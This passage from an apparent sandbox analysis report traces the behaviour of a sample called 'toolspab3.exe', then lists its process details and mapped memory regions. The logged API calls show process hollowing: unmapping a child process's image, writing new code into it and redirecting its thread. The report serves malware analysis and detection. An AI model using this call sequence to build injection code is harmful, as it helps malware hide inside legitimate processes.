[118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0066.139] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18bfc8, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18bfc8*, lpNumberOfBytesRead=0x0) returned 1 [0066.139] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0066.146] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0066.146] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x215a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x215a0*, NumberOfBytesWritten=0x0) returned 0x0 [0066.149] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x217a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x217a0*, NumberOfBytesWritten=0x0) returned 0x0 [0066.154] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x21654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x21654*, lpNumberOfBytesWritten=0x0) returned 1 [0066.155] SetThreadContext (hThread=0x74, lpContext=0x220000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x402f47, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0066.156] ResumeThread (hThread=0x74) returned 0x1 [0066.230] CloseHandle (hObject=0x74) returned 1 [0066.230] CloseHandle (hObject=0x78) returned 1 [0066.230] ExitProcess (uExitCode=0x0) [0066.232] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a07d0) returned 1 [0066.232] HeapFree (in: hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a07d0 | out: hHeap=0x9a0000) returned 1 Process: id = "2" image_name = "toolspab3.exe" filename = "c:\\users\\keecfmwgj\\desktop\\toolspab3.exe" page_root = "0x45bdd000" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe44" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 318 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 319 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 320 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 321 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 322 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 323 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 324 start_va = 0x400000 end_va = 0x4d3fff monitored = 1 entry_point = 0x423db0 region_type = mapped_file name = "toolspab3.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\toolspab3.exe") Region: id = 325 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 326 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 327 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 328 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 329 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 330 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 331 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 332 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 333 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 334 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 335 start_va = 0x340000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 336 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 337 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 338 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 339 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 340 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 341 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 342 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 343 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 344 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 345 start_va = 0x410000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 346 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 347 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 348 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 349 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 350 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 351 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 352 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 353 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 354 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 355 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 356 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 357 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 358 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 359 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 360 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 361 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 362 start_va = 0x410000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 363 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 364 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 365 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 366 start_va = 0x5c0000 end_va = 0x747fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 367 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 368 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 369 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 370 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 